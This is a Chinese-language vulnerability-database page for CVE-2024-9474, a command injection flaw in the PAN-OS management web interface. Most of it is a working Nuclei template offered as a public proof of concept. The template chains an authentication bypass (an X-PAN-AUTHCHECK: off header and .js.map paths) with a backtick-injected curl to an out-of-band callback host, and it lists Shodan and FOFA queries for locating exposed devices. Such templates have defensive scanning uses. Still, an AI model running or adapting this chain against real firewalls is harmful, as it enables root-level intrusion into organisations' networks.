CVE-2024-9474: PAN-OS Management Web Interface - Command Injection

日期: 2025-08-01 | 影响软件: PAN-OS | POC: 已公开

漏洞描述

A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges. Cloud NGFW and Prisma Access are not impacted by this vulnerability.

PoC代码[已公开]

id: CVE-2024-9474

info:
  name: PAN-OS Management Web Interface - Command Injection
  author: watchTowr,iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
    Cloud NGFW and Prisma Access are not impacted by this vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2024-9474
    cwe-id: CWE-78
    epss-score: 0.94174
    epss-percentile: 0.99912
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: paloaltonetworks
    product: pan-os
    shodan-query:
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
      - http.favicon.hash:"-631559155"
    fofa-query: icon_hash="-631559155"
  tags: cve,cve2024,panos,rce,kev,vkev

flow: http(1) && http(2) && http(3)

variables:
  rand: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1
        Host: {{Hostname}}
        X-PAN-AUTHCHECK: off

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "0.0.0")'
          - 'contains_all(header, "Expires: 0", "PHPSESSID=", "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        POST /php/utils/createRemoteAppwebSession.php/{{rand}}.js.map HTTP/1.1
        Host: {{Hostname}}
        X-PAN-AUTHCHECK: off
        Content-Type: application/x-www-form-urlencoded

        user=`curl+{{interactsh-url}}`&userRole=superuser&remoteHost=&vsys=vsys1

    matchers:
      - type: word
        part: body
        words:
          - "@start@PHPSESSID="
        internal: true

    extractors:
      - type: regex
        part: body
        name: phpsessid
        group: 1
        regex:
          - '@start@PHPSESSID=(.*?)@end@'
        internal: true

  - raw:
      - |
        GET /index.php/.js.map HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{phpsessid}}
        X-PAN-AUTHCHECK: off

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(body, "panos")'
        condition: and
# digest: 4a0a00473045022100e6bb9ee20fffae3c67e81f232965f48afd62b1f34b050435671ee0630284e630022059973839c056078f80a8895c6fe4e06b48059494b62d885bb50005abf3e83bfa:922c64590222798bb761d5b6d8e72950

相关漏洞推荐